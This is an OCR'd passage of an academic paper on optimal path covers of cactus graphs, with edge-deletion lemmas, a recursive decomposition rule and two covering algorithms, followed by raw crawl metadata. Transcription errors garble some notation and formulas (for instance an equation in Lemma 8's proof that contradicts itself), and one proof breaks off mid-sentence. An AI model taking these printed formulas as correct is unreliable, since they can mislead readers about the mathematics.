Lemma 1 can be used to convert a cactus into a trimmed cactus with no semi-forks, where all end-cycles are either of order 2 or of order 3. The rest of the edge-deletion rules are concerned with such end-cycles. The following lemma is proved using Proposition 1.
**Lemma 3** [9] (Deletions due to end-cycles of order 2 or isolated cycles): Let \( G = (V_\sigma, E_\sigma) \) be a cactus. Let \( C \) be a subgraph of \( G \) which is either an isolated cycle or an end-cycle of order 2. Let \( v_1, v_2, ..., v_k \) be the vertices on \( C^o \) (starting from the anchor, if such exists). Then \( G' = (V_\sigma, E'_\sigma) \) where \( E'_\sigma = E_\sigma - \{(v_1, v_2)\} \) satisfies \( \pi(G') = \pi(G) \). \( \Box \)
Suppose that neither Lemma 1 nor Lemma 3 is applicable to a cactus \( G \). Then each end-cycle in \( G \) is of order 3. The following lemmas are concerned with such end-cycles.
**Definition 4:** Let \( G = (V_\sigma, E_\sigma) \) be a cactus. Let \( tr(v) = (v, v_1, ..., v_k) \) be the single trail starting at a vertex \( v \in V_\sigma \). Then \( tr^{-1}(v) \) is the path \((v_k, v_{k-1}, ..., v_1, v)\). Let \( p_1 = (v_1, ..., v_k) \) and \( p_2 = (u_1, ..., u_l) \) be two paths in \( G \), where \((v_k, u_1) \in E_\sigma \). Then \( p_1, p_2 \) is the path \((v_1, ..., v_k, u_1, ..., u_l)\).
**Lemma 4** (Switching edges in a cover of an end-cycle of order 3): Let \( G = (V_\sigma, E_\sigma) \) be a cactus. Let \( C \subseteq G \) be an end-cycle of order 3 where \( v_1, v_2, v_3, ..., v_k \) are the vertices on \( C^o \), starting from the anchor. Let \( S_\sigma \) be an optimal cover of \( G \) which employs \((v_1, v_2)\) but not \((v_1, v_k)\). Then there exists an optimal cover of \( G \), denoted by \( \tilde{S}_\sigma \), which employs \((v_1, v_k)\) but not \((v_1, v_2)\).
**Proof:** Let \( p = p_1, p_2 \) be the path in \( S_\sigma \) which employs \( e \), where \( p_1 \) may be empty (i.e. contain no vertices) and \( p_2 = (v_1, v_2, ..., v_n) \), \( n \geq 2 \). \( \tilde{S}_\sigma \) is defined as follows. All paths in \( S_\sigma \) that do not cover vertices in \( C \) are also in \( \tilde{S}_\sigma \).
Observe that since \( C \) contains \( k-1 \) vertices of degree 1 and \( p \) contains at most one of them, at least \( \left\lceil \frac{k-1}{2} \right\rceil \) additional paths are
used by \( S_G \) to cover the vertices in \( C \) and in \( p_1 \). To prove the lemma, it suffices to show that \( S_G \) uses exactly \( \lfloor \frac{n}{2} \rfloor \) paths to cover those vertices, employing \((v_1, v_k)\) but not \((v_1, v_2)\). This is established by having \( S_G \) cover those vertices using the paths \( p_1, p_2, \ldots, p_{\lfloor \frac{n}{2} \rfloor} \) as follows (see Figure 4, where the bold edges are employed by \( S_G \)):
\[
(1) \quad p_1 = p'_-(v_1) \cdot \text{tr}(v_k).
\]
\[
(2) \quad \text{For } 1 < i < \lfloor \frac{n}{2} \rfloor, \quad p_i = \text{tr}^{-1}(v_{k-2i+3}) \cdot \text{tr}(v_{k-2i+2}).
\]
\[
(3) \quad p_{\lfloor \frac{n}{2} \rfloor} = \text{tr}^{-1}(v_3) \cdot \text{tr}(v_2) \text{ if } k \text{ is even, and } p_{\lfloor \frac{n}{2} \rfloor} = \text{tr}(v_2) \text{ if } k \text{ is odd}. \]
Definition 5: Let \( G=(V_G, E_G) \) be a cactus. An anchor-trailed end-cycle of \( G \) is an end-cycle of order 3 where the anchor is the start-point of a trail.
Lemma 5 (Deletions due to anchor-trailed end-cycles): Let \( G=(V_G, E_G) \) be a cactus. Let \( C \in G \) be an anchor-trailed end-cycle, where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C^0 \), starting from the anchor. Then \( G'=(V_G, E'_G) \) where \( E'_G = E_G - \{(v_1, v_3)\} \) satisfies \( \pi(G')=\pi(G) \).
Proof: Clearly \( \pi(G) \leq \pi(G') \). To prove the reverse inequality (hence equality), we show that every optimal cover of \( G \) defines an equal-size cover of \( G' \). Let \( S_G \) be an optimal cover of \( G \).
\[
(1) \quad \text{If } (v_1, v_3) \text{ is not employed by } S_G \text{ then we are done, since } S_G \text{ is also a cover of } G'.
\]
\[
(2) \quad \text{If } (v_1, v_3) \text{ is employed by } S_G \text{ but } (v_1, v_k) \text{ is not, then by Lemma 4 there exists an equal-size cover of } G \text{ where } (v_1, v_2) \text{ is not employed but } (v_1, v_k) \text{ is. This cover is also a cover of } G'.
\]
\[
(3) \quad \text{Suppose that } (v_1, v_2) \text{ and } (v_1, v_k) \text{ are both employed by } S_G. \text{ Let } u \text{ be the second vertex on a trail starting at } v_1; \text{ observe that } (u, v_1) \text{ is not employed by } S_G. \text{ By modifying } S_G \text{ to employ } (u, v_1) \text{ rather than } (v_1, v_2), \text{ one obtains, using Proposition 1, an equal-size cover of } G \text{ where } (v_1, v_2) \text{ is not employed. This cover is also a cover of } G'. \]
Definition 6: Let \( G=(V_G, E_G) \) be a cactus. A bridged end-cycle of \( G \) is an end-cycle of order 3 where the anchor is of degree 3.
Lemma 6 (Deletions due to bridged end-cycles): Let \( G=(V_G, E_G) \) be a cactus. Let \( C \in G \) be a bridged end-cycle, where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C^0 \), starting from the anchor. Then \( G'=(V_G, E'_G) \) where \( E'_G = E_G - \{(v_2, v_3)\} \) satisfies \( \pi(G')=\pi(G) \).
Proof: Clearly \( \pi(G) \leq \pi(G') \). To prove the reverse inequality, we show that every optimal cover of \( G \) defines an equal-size cover of \( G' \). Let \( S_G \) be an optimal cover of \( G \). If \((v_2, v_3)\) is not employed by \( S_G \) then we are done, since \( S_G \) is also a cover of
Suppose that \((V_1oV_2)\) is employed by \(S_0\). Let \(u\) be the second vertex on \(tr(v_2)\). Since \((V_2,v_3)\) is employed by \(S_0\), \((u,v_2)\) is not employed by \(S_0\). By modifying \(S_0\) to employ \((u,v_2)\) rather than \((v_2,v_3)\) one obtains, using Proposition 1, an equal-size cover of \(G\) where \((v_2,v_3)\) is not employed. This cover is also a cover of \(G'\).
(2) Suppose that \((v_1,v_2)\) is not employed by \(S_0\) but \((v_1,v_k)\) is. Then by Lemma 4, there exists an equal-size cover of \(G\) where \((v_1,v_k)\) is not employed but \((v_1,v_2)\) is, and the argument of (1) above applies.
(3) Suppose that neither \((v_1,v_2)\) nor \((v_1,v_k)\) is employed by \(S_0\). In this case, \(v_1\) is the end-vertex of some path \(p \in S_0\) and \((u,v_2)\) is employed by \(S_0\). By modifying \(S_0\) to employ \((v_1,v_3)\) rather than \((v_2,v_3)\) one obtains, using Proposition 1, an equal-size cover of \(G\) where \((v_2,v_3)\) is not employed. This cover is also a cover of \(G'\).
Definition 7: Let \(G = (V_0, E_0)\) be a cactus. An odd-trailed end-cycle of \(G\) is an end-cycle of order 3, \(C\), where the number of trails starting on \(C^o\) is odd. An even-trailed end-cycle of \(G\) is an end-cycle of order 3, \(C\), where the number of trails starting on \(C^o\) is even.
Lemma 7 (Deletions due to odd-trailed end-cycles): Let \(G = (V_0, E_0)\) be a cactus. Let \(C \subseteq G\) be an odd-trailed end-cycle where \(v_1, v_2, ..., v_k\) are the vertices on \(C^o\), starting from the anchor. Then \(G' = (V_0, E_0')\) where \(E_0' = E_0 - \{(v_1,v_2)\}\) satisfies \(\pi(G') = \pi(G)\).
Proof: Clearly \(\pi(G) \leq \pi(G')\). To prove the reverse inequality, we show that every optimal cover of \(G\) defines an equal-size cover of \(G'\). Let \(S_0\) be an optimal cover of \(G\).
(1) If \((v_1,v_2)\) is not employed by a path in \(S_0\) then we are done, since \(S_0\) is also a cover of \(G'\).
(2) If \((v_1,v_2)\) is employed by \(S_0\) but \((v_1,v_k)\) is not, then by Lemma 4 there exists an equal-size cover of \(G\) where \((v_1,v_2)\) is not employed but \((v_1,v_k)\) is. This latter cover is also a cover of \(G'\).
(3) Suppose that \((v_1,v_2)\) and \((v_1,v_k)\) are both employed by \(S_0\). Clearly, every path of \(S_0\) either covers only vertices in \(C\) or only vertices not in \(C\). In this case, an equal-size cover of \(G\), denoted by \(\tilde{S}_0\), can be constructed as follows. All paths in \(S_0\) that do not cover vertices in \(C\) are also in \(\tilde{S}_0\). Observe that at least \(\lceil \frac{k}{2} \rceil\) additional paths are used by \(S_0\) to cover the vertices in \(C\). To prove that \(\tilde{S}_0\) is an optimal cover of \(G'\), it suffices to show that it uses exactly \(\lceil \frac{k}{2} \rceil\) paths to cover those vertices, without employing \((v_1,v_2)\). This is established by having \(\tilde{S}_0\) cover those vertices using the paths \(p_1, p_2, ..., p_{\frac{k}{2}}\), where \(p_1 = v_1 \cdot tr(v_2)\) and for \(1 < i \leq \lceil \frac{k}{2} \rceil\), \(p_i = tr^{-1}(v_{k-2i+2}) \cdot tr(v_{k-2i+3})\). □
Definition 8: Let \(C = (V_c, E_c)\) be a crown where \(C^o\) contains an odd number of vertices \(v_1, v_2, ..., v_k\), each of which is of degree 3 except for \(v_1\). Then \(C^o\) is defined to be the graph induced on \(V_c - \{v_1\}\). Define \(\Delta(C)\) to be a cover of \(C\) using
\[
\frac{k-1}{2}
\]
paths as follows:
1. \[p_1 = tr^{-1}(v_2) \cdot tr(v_k) .\]
2. If \(k > 3\), then for \(1 < i \leq \frac{k-1}{2}\), \(p_i = tr^{-1}(v_{2i-1}) \cdot tr(v_{2i}).\)
Define \(A(C^\sigma)\) to be a cover of \(C^\sigma\) using \(\frac{k-1}{2}\) paths as follows: For \(1 \leq i \leq \frac{k-1}{2}\), \(p_i = tr^{-1}(v_{2i}) \cdot tr(v_{2i+1}).\)
**Lemma 8 (Covering even-trailed end-cycles using \(A\) and \(\Delta\))**: Let \(G=(V_\sigma, E_\sigma)\) be a cactus. Let \(C \in G\) be an even-trailed end-cycle where \(v_1, v_2, \ldots, v_k\) are the vertices on \(C^\sigma\), starting from the anchor. Let \(S_\sigma\) be an optimal cover of \(G\).
1. If \(S_\sigma\) employs neither \((v_1,v_2)\) nor \((v_1,v_k)\), then \(S_\sigma\) uses \(A(C^\sigma)\) to cover \(C^\sigma\).
2. If \(S_\sigma\) employs both \((v_1,v_2)\) and \((v_1,v_k)\), then \(S_\sigma\) uses \(\Delta(C)\) to cover \(C\).
**Proof**:
1. Let \(S\) be the set of paths used by \(S_\sigma\) to cover \(C^\sigma\). If \(S \neq A(C^\sigma)\), then there exists a path \(p=(u_1, \ldots, u_k) \in S\) where at least one vertex from \(\{u_1, u_k\}\) is not the end-vertex of a trail. Since there are \(k-1\) trails starting on \(C^\sigma\), \(S-\{p\}\) must cover at least \(k-2\) vertices of degree 1, using at least \(k-2\) paths. Thus, \(|S|=1+|S-\{p\}|=1+\frac{k-1}{2}=\frac{k-1}{2}\). Since \(\lambda(A(C^\sigma))=\frac{k-1}{2}\), a contradiction to the optimality of \(S_\sigma\) arises.
2. The proof for this case is similar to that former case, and is omitted. \(\square\)
**Lemma 9 (Deletions due to even-trailed end-cycles that share a vertex)**: Let \(G=(V_\sigma, E_\sigma)\) be a cactus. Let \(X=\{C_1, C_2, \ldots, C_n\}\) (\(n>1\)) be a set of even-trailed end-cycles in \(G\), all sharing the anchor \(v_1\). Let \(v_1, v_2, \ldots, v_k\) be the vertices on \(C_1^\sigma\), starting from the anchor. Then \(G'=G_\sigma=(V_\sigma, E_\sigma')\) where \(E_\sigma'=E_\sigma-\{(v_1,v_2)\}\) satisfies \(\pi(G')=\pi(G)\).
**Proof** : Clearly \(\pi(G)\leq \pi(G')\). To prove the reverse inequality, we show that every optimal cover of \(G\) defines an equal-size cover of \(G'\). Let \(S_\sigma\) be an optimal cover of \(G\).
1. If \((v_1,v_2)\) is not employed by a path in \(S_\sigma\) then we are done, since \(S_\sigma\) is also a cover of \(G'\).
2. If \((v_1,v_2)\) is employed by \(S_\sigma\) but \((v_1,v_k)\) is not, then by Lemma 4 there exists an equal-size cover of \(G\) that employs \((v_1,v_k)\) but not \((v_1,v_2)\). This latter cover is also a cover of \(G'\).
3. Suppose that \((v_1,v_2)\) and \((v_1,v_k)\) are both employed by \(S_\sigma\). Then in some other even-trailed end-cycle \(C_i \in X\), neither of the edges incident to \(v_1\) is employed. By Lemma 8, \(S_\sigma\) covers \(C\) and \(C_i^\sigma\) using \(\Delta(C)\) and \(\lambda(C_i^\sigma)\), respectively. Observe that an equal-size cover of \(G\) is given by \(\left((S_\sigma-\Delta(C))-\lambda(C_i^\sigma)\right) \cup \lambda(C^\sigma) \cup \Delta(C_i)\). This latter cover does not employ \((v_1,v_2)\), and is thus a cover of \(G'\). \(\square\)
3. A Recursive Decomposition Rule
In this section we consider end-cycles to which neither of the above edge-deletion rules is applicable. Let \( G=(V_a, E_a) \) be a cactus that properly contains a cycle. If \( G \) contains no semi-forks (hence, no forks), then by Lemma 2 \( G \) contains an end-cycle. Moreover, all end-cycles in \( G \) are either of order 2 or of order 3. Assume that no end-cycle of \( G \) is anchor-trailed, bridged, odd trailed or an even-trailed that shares its anchor with other even-trailed end-cycles. Then any end-cycle \( C \in G \) must be even-trailed where the degree of the anchor is 4. The recursive decomposition rule applies to such end-cycles.
**Definition 9:** Let \( G=(V_a, E_a) \) be a cactus. A final even-trailed end-cycle of \( G \) is an even-trailed end-cycle where the anchor is of degree 4. Let \( C=(V_e, E_e) \) be a final even-trailed end-cycle in \( G \), where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C \), starting from the anchor. Let \( u \) and \( w \) be the vertices adjacent to \( v_1 \) that are not on \( C \). Then \( G|C \) is defined to be the graph \( G|C=(V_e \setminus V_a, E_e \setminus E_a) \cup \{(u,w)\} \) (see Figure 5).
(Insert Figure 5 here)
**Lemma 10** (Recursive decomposition rule for final even-trailed end-cycles, part I): Let \( G=(V_a, E_a) \) be a cactus. Let \( C \in G \) be a final even-trailed end-cycle where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C \), starting from the anchor. Then \( \pi(G|C) \leq \pi(G) - \frac{k-1}{2} \).
**Proof:** Let \( S_a \) be an optimal cover of \( G \). It is proved that \( S_a \) defines a cover \( S_{\text{alc}} \) of \( G|C \) such that \( |S_{\text{alc}}| = |S_a| - \frac{k-1}{2} \).
In the sequel, let \( u \) and \( w \) be the vertices adjacent to \( v_1 \) that are not on \( C \).
1. Suppose that neither \((u,v_1)\) nor \((v_1,w)\) is employed by \( S_a \). In this case, it is easily verified that \( S_a \) uses \( \Delta(C) \) to cover \( C \). Observe that for each edge \( e \in E_a \), if \( e \) is employed by \( S_a - \Delta(C) \) then \( e \) is an edge in \( G|C \). Thus, \( S_{\text{alc}} = S_a - \Delta(C) \) is a cover of \( G|C \). Its size is given by \( |S_{\text{alc}}| = |S_a| - \frac{k-1}{2} \).
2. Suppose that exactly one edge from \( \{(u,v_1),(v_1,w)\} \), say \( e = (u,v_1) \), is employed by \( S_a \). Let \( p = p_1 \cdot (u,v_1) \cdot p_2 \) be the path in \( S_a \) which employs \( e \), where \( p_1 \) and \( p_2 \) may be empty. Using Proposition 1 and the fact that \( C \) is even-trailed, the reader can verify that an equal-size cover of \( G \) which employs neither \((u,v_1)\) nor \((v_1,w)\) but both \((v_1,v_2)\) and \((v_1,v_k)\) can be obtained by replacing \( p \) by \( p_1 \cdot (u) \) and using \( \Delta(C) \) to cover \( C \). From here, the argument of (1) above applies.
3. Suppose that both \((u,v_1)\) and \((v_1,w)\) are employed by \( S_a \). Then neither \((v_1,v_2)\) nor \((v_1,v_k)\) is employed by \( S_a \). By Lemma 8, \( S_a \) uses \( \Delta(C^*) \) to cover \( C \). Let \( p \in S_a \) be the path employing \((u,v_1)\) and \((v_1,w)\), and let \( p' \) be the path obtained by deleting \( v_1 \) from \( p \). Then \( S_{\text{alc}} = (S_a - \Delta(C^*)) \setminus \{p\} \cup \{p'\} \) is a cover of \( G|C \), and its size is...
Lemma 11 (Recursive decomposition rule for final even-trailed end-cycles, part II): Let \( G = (V_G, E_G) \) be a cactus. Let \( C \in G \) be a final even-trailed end-cycle where \( v_1, v_2, \ldots, v_k \) are the vertices on \( C \), starting from the anchor. Let \( u \) and \( w \) be the vertices adjacent to \( v_1 \) that are not on \( C \), and let \( S_{\text{alc}} \) be an optimal cover of \( G \mid C \).
1) Suppose that some path \( p \in S_{\text{alc}} \) employs \((u, w)\). Let \( p' \) be the path obtained from \( p \) by inserting \( v_1 \) between \( u \) and \( w \). Then \( S_G = (S_{\text{alc}} - \{p\}) \cup p' \cup \Delta(C') \) is an optimal cover of \( G \).
2) If \( S_{\text{alc}} \) does not employ \((u, w)\), then \( S_G = S_{\text{alc}} \cup \Delta(C) \) is an optimal cover of \( G \).
Proof: In both cases, \( |S| = |S_G| = \frac{k-1}{2} \). Combining this fact with Lemma 10, we conclude that \( S_G \) is optimal.
4. The Algorithm
In this section we present an algorithm for optimal covering of cacti. A first version of the algorithm, called Algorithm A, is given below. The purpose of this version is to demonstrate the algorithmic use of the edge-deletion rules and the recursive decomposition rule. In doing so, we focus on simplicity rather than efficiency. An efficient (and more complicated) algorithm is described later.
Informally, Algorithm A runs as follows. The edge-deletion rules are repeatedly applied to delete edges from the input cactus, \( G \). When neither of the edge-deletion rules is applicable any more, the recursive decomposition rule is invoked, and the algorithm is recursively applied to the resulting graph. Eventually, \( G \) reduces to a set of paths which constitutes an optimal cover of \( G \).
We next review some definitions that were given in the previous sections, to be used by the algorithm. Let \( G = (V_G, E_G) \) be a cactus. A vertex \( v \in V_G \) is a fork if \( \deg(v) \geq 3 \) and at least two trails start at \( v \). A vertex \( v_1 \in V_G \) is a semi-fork if \( \deg(v_1) \geq 3 \), exactly one trail \((v_1, v_2, \ldots)\) starts at \( v_1 \), and \( v_1 \) is adjacent to a vertex \( w \) where \( \deg(w) = 2 \) (\( w \neq v_2 \)).
An anchor-trailed end-cycle is an end-cycle of order 3 where the anchor is the start-point of a trail. A bridged end-cycle is an end-cycle of order 3 where the anchor is of degree 3. An odd-trailed end-cycle is an end-cycle of order 3, \( C \), where the number of trails starting on \( C \) is odd. An even-trailed end-cycle is an end-cycle of order 3, \( C \), where the number of trails starting on \( C \) is even. A final even-trailed end-cycle is an even-trailed end-cycle where the anchor is of degree 4.
We are now able to present our covering algorithm.
Algorithm A
**Input**: A cactus \( G = (V_G, E_G) \).
**Output**: A set of paths \( S_G \), comprising an optimal cover of \( G \).
**Procedure used**:
**Procedure** Transfer-Paths;
do
Add the isolated paths in $G=(V_o, E_o)$ to $S_o$.
$V_o \leftarrow V_o \{ v \in V_o \mid \text{some path in } S_o \text{ covers } v \}$.
$E_o \leftarrow E_o \{ e \in E_o \mid \text{some path in } S_o \text{ employs } e \}$.
od
Method:
1. Initialize $S_o \leftarrow \emptyset$.
2. Transfer-Paths.
3. While $G=(V_o, E_o)$ contains forks,
3.1 Choose a fork $v$.
3.2 Apply Lemma 1 to $v$.
3.3 Transfer-Paths.
(* Comment: At this point, $G$ is a union of trimmed cacti. *)
4. If $G=(V_o, E_o)$ contains a semi-fork $v$, then
4.1 Apply Lemma 1 to $v$.
4.2 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are either of order 2 or of order 3. *)
5. If $G=(V_o, E_o)$ contains a subgraph $C$ which is either an isolated cycle or an end-cycle of order 2, then
5.1 Apply Lemma 3 to $C$.
5.2 Transfer-Paths.
5.3 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are of order 3. *)
6. If $G=(V_o, E_o)$ contains a anchor-trailed end-cycle, $C$, then
6.1 Apply Lemma 5 to $C$.
6.2 Go to step 3.
7. If $G=(V_o, E_o)$ contains a bridged end-cycle, $C$, then
7.1 Apply Lemma 6 to $C$.
7.2 Go to step 3.
8. If $G=(V_o, E_o)$ contains an odd-trailed end-cycle, $C$, then
8.1 Apply Lemma 7 to $C$.
8.2 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are even-trailed end-cycles. *)
9. If $G=(V_o, E_o)$ contains two or more even-trailed end-cycles that share a vertex $v$, then
9.1 Choose an even-trailed end-cycle $C$ from these sharing $v$.
9.2 Apply Lemma 9 to $C$.
9.3 Go to step 3.
(* Comment: At this point, all end-cycles in $G$ are final even-trailed end-cycles. *)
10. If $G=(V_o, E_o)$ contain a final even-trailed end-cycle, $C$, then
10.1 Let $v$ be the anchor of $C$. Let $u$ and $w$ be the vertices adjacent to $v$ that are not on $C^*$.
10.2 Recursively apply the algorithm to $G|C$, resulting in an optimal cover $S_{ac}$.
10.3 If $(u,w)$ is employed by a path $p \in S_{ac}$, then
10.3.1 Let $p'$ be the path obtained from $p$ by inserting $v$ between $u$ and $w$.
10.3.2 $S_o \leftarrow S_o \cup (S_{ac}-(p)) \cup p' \cup A(C^*)$
Theorem 1 (Correctness of Algorithm A): Given a cactus $G=(V_0, E_0)$, Algorithm A produces an optimal path cover of $G$.
Proof: Whenever the algorithm returns to step 3, the size of $E_0$ is strictly smaller than it was in the previous execution of step 3. Thus, the algorithm eventually terminates, since none of the conditions tested in steps 3-10 holds when $E_0 = \emptyset$.
Upon termination, $G$ contains no forks, semi-forks, isolated cycles, or end-cycles. Hence, by Lemma 2, $G$ contains no non-isolated cycles. Also, $G$ contains no isolated paths upon termination, for such paths, which are generated only by applying Lemmas 1 and 3, are immediately transferred to $G$. It follows that upon termination $V_0 = \emptyset$, so $S_0$ is a cover of $G$.
The algorithm deletes edges from $G$ only by applying the edge-deletion rules. The decomposition rule ensures that the construction of an optimal cover, upon return from each recursive invocation of the algorithm, is properly done. We conclude that when the algorithm terminates, $|S_0| = \pi(G)$. \hfill \qedsymbol
Using the fact that the number of cycles in a cactus $G=(V_0, E_0)$ is $O(|E_0|)$, the reader can verify that Algorithm A can be implemented in $O(|E_0|^2) = O(|V_0|^2)$ time. However, a better bound is in fact achievable by Algorithm B below.
Algorithm B is based on the DFS (depth-first search) algorithm ([7], see also [4]), with which we assume the reader is familiar.
Definition 10: An EDFS is a DFS extended to identify forks/semi-forks upon backtracking from such. Recall that DFS generates a directed tree, where edges not in the tree are called back-edges. Assume that an EDFS is applied to a cactus $G=(V_0, E_0)$, and that $e \in E_0$ is a back-edge of the EDFS tree. Then $C(e)$ is defined to be the unique cycle in $G$ which contains $e$. The source of a cycle $C$ with respect to the EDFS is the first vertex on $C$ which was discovered by the EDFS.
Note that if $v$ is a source of a cycle, $C$, then there is a back-edge $(u \rightarrow v)$ on $C$ entering $v$. Let $G=(V_0, E_0)$ be a graph, and let $v \in V_0$ be a separation vertex of $G$. Assume that one of the connected components which $v$ separates from $G$ is a tree, $T$.
An elimination of $T$ from $G$ is an EDFS traversal of $T$, starting from $v$, where Lemma 1 is applied to each fork $u \in V_0 - \{v\}$ upon backtracking from $u$.
Algorithm B, whose time complexity is an $O(|V_0|)$, is outlined below. It is based on an EDFS traversal of the input cactus. In the course of the EDFS, the edge-deletion rules, as well as the recursive decomposition rule, are applied to $G$, resulting in a properly smaller graph. Specifically, these rules are applied whenever the algorithm backtracks from a fork that is not on a cycle, or from a source of a cycle. The isolated paths created by applying the edge-deletion rules are transferred to set $S_0$, which eventually constitutes an optimal cover of $G$. Whenever a final even-trailed end-cycle, $C$, is detected, the two
vertices adjacent to the anchor of $C$ are connected to form $G|C$; $C$ is then pushed onto a stack, to be covered when $G|C$ is fully covered.
Algorithm B
Initialize $S_o \leftarrow \emptyset$. Starting from an arbitrary vertex, traverse $G$ using EDFS. Immediately before backtracking from a vertex $v$, invoke procedure $Backtrack-From(v)$, described below -
Procedure $Backtrack-From(v)$
\begin{verbatim}
do
1 Record the father of $v$.
2 If $v$ is not on a cycle and is a fork, apply Lemma 1 to $v$.
3 If $v$ is the source of a cycle, perform the following:
3.1 Let $B_v$ be the set of EDFS back-edges entering $v$. Temporarily suspend the EDFS, and for each $e = (u \rightarrow v) \in B_v$, re-traverse the remaining edges of $C(e)$ - backtracking the EDFS tree-edges, starting from $u$. Stop the re-traversal of $C(e)$ upon discovering a fork or a semi-fork. If none exists - count the number of trails starting on $C(e)$.
3.2 Let $S = \{ e \in B_v \mid C(e) \text{ contains a fork or a semi-fork} \}$. For each $e \in S$, apply Lemma 1 to a fork or a semi-fork on $C(e)$, transferring the isolated paths thus created to $S_o$.
3.3 The remaining edges of the cycles of $S$ induce a tree which is separated from $G$ by $v$. Eliminate this tree from $G$, transferring the isolated paths thus created to $S_o$.
3.4 While $B_v$ contains an edge $e$ such that no edge on $C(e)$ was deleted, perform the following:
3.4.1 If $C(e)$ is an isolated cycle or is contained in an end-cycle, $C$, that satisfies the requirements of some edge-deletion lemma, perform the following:
Apply that lemma to $C$. The remaining edges of $C$ now induce a tree which is separated from $G$ by $v$. Eliminate this tree from $G$, transferring the isolated paths thus created to $S_o$.
3.4.2 If $C(e)$ underlies a final even-trailed end-cycle, $C$, perform the following:
Let $u$ and $w$ be the vertices adjacent to $v$ that are not on $C$. Delete all the vertices of $C$ from $G$, and connect $u$ and $w$ to form $G|C$. Push $C$ onto the stack of the vet-uncovered
\end{verbatim}
Theorem 2 (Correctness of Algorithm B): Given a cactus \( G=(V_\alpha, E_\alpha) \), Algorithm B produces an optimal cover of \( G \) in \( O(|V_\alpha|) \) time.
Proof (Outline): The theorem can be established using the following claims, which, in turn, can be verified by standard techniques for proving the correctness of DFS-based algorithms. In the sequel, we say that \( u \) is a descendant of \( v \) at a given time within the execution of the algorithm, if, at that time, \( u \) is reachable from \( v \) by a sequence of tree edges \((v \rightarrow x_1), (x_1 \rightarrow x_2), \ldots, (x_{n-1} \rightarrow x_n), (x_n \rightarrow u)\).
1. Upon invoking \( \text{Backtrack-From}(v) \), \( v \) is on a cycle iff there is a back-edge entering \( v \) or \( \text{lowpoint}(v) \leq \delta(v) \) (see [4]). Hence, checking if \( v \) is on a cycle can be done in constant time.
2. Upon invoking \( \text{Backtrack-From}(v) \), if \( v \) is not on a cycle then no descendant of \( v \) is a fork or on a cycle.
3. Upon invoking \( \text{Backtrack-From}(v) \), if \( v \) is the source of cycles \( C_1, C_2, \ldots, C_n \), then no descendant of \( v \), except perhaps for those on some \( C_i \) \((1 \leq i \leq n)\), is a fork or on a cycle. Hence, for \( 1 \leq i \leq n \), \( C_i \) is either an end-cycle or contains a fork.
4. If \( v \) is the source of cycles \( C_1, C_2, \ldots, C_n \) upon invoking \( \text{Backtrack-From}(v) \), then on completion of \( \text{Backtrack-From}(v) \), no descendant of \( v \) is a fork or on a cycle.
5. Each edge \( e \in E_\alpha \) is scanned a constant number of times (twice by the EDFS, at most once by the re-traversal, and at most twice by either the elimination process or the covering of the final even-trailed end-cycles).
References
Figure 1. A Cactus (reproduced from [1])
Figure 2. End-cycles
Figure 3. The superstructure of Lemma 2
Figure 4. The new cover of Lemma 4
Figure 5. Definition of $G|C$
|
{"Source-Url": "http://www.cs.technion.ac.il/users/wwwb/cgi-bin/tr-get.cgi/1988/CS/CS0501.pdf", "len_cl100k_base": 12680, "olmocr-version": "0.1.50", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 51410, "total-output-tokens": 14793, "length": "2e13", "weborganizer": {"__label__adult": 0.0004200935363769531, "__label__art_design": 0.0006155967712402344, "__label__crime_law": 0.0005130767822265625, "__label__education_jobs": 0.00212860107421875, "__label__entertainment": 0.00016510486602783203, "__label__fashion_beauty": 0.00021755695343017575, "__label__finance_business": 0.00045680999755859375, "__label__food_dining": 0.0005407333374023438, "__label__games": 0.0018033981323242188, "__label__hardware": 0.002338409423828125, "__label__health": 0.0009860992431640625, "__label__history": 0.0007419586181640625, "__label__home_hobbies": 0.0003647804260253906, "__label__industrial": 0.0008168220520019531, "__label__literature": 0.0006356239318847656, "__label__politics": 0.0003371238708496094, "__label__religion": 0.0006995201110839844, "__label__science_tech": 0.35400390625, "__label__social_life": 0.0001310110092163086, "__label__software": 0.01107025146484375, "__label__software_dev": 0.619140625, "__label__sports_fitness": 0.0004916191101074219, "__label__transportation": 0.0011615753173828125, "__label__travel": 0.0003483295440673828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40032, 0.03014]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40032, 0.69817]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40032, 0.85518]], "google_gemma-3-12b-it_contains_pii": [[0, 123, false], [123, 780, null], [780, 3552, null], [3552, 6286, null], [6286, 9625, null], [9625, 13205, null], [13205, 16444, null], [16444, 19866, null], [19866, 23009, null], [23009, 26380, null], [26380, 29373, null], [29373, 31549, null], [31549, 34582, null], [34582, 36688, null], [36688, 38976, null], [38976, 39865, null], [39865, 39928, null], [39928, 39968, null], [39968, 40003, null], [40003, 40032, null]], "google_gemma-3-12b-it_is_public_document": [[0, 123, true], [123, 780, null], [780, 3552, null], [3552, 6286, null], [6286, 9625, null], [9625, 13205, null], [13205, 16444, null], [16444, 19866, null], [19866, 23009, null], [23009, 26380, null], [26380, 29373, null], [29373, 31549, null], [31549, 34582, null], [34582, 36688, null], [36688, 38976, null], [38976, 39865, null], [39865, 39928, null], [39928, 39968, null], [39968, 40003, null], [40003, 40032, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40032, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], 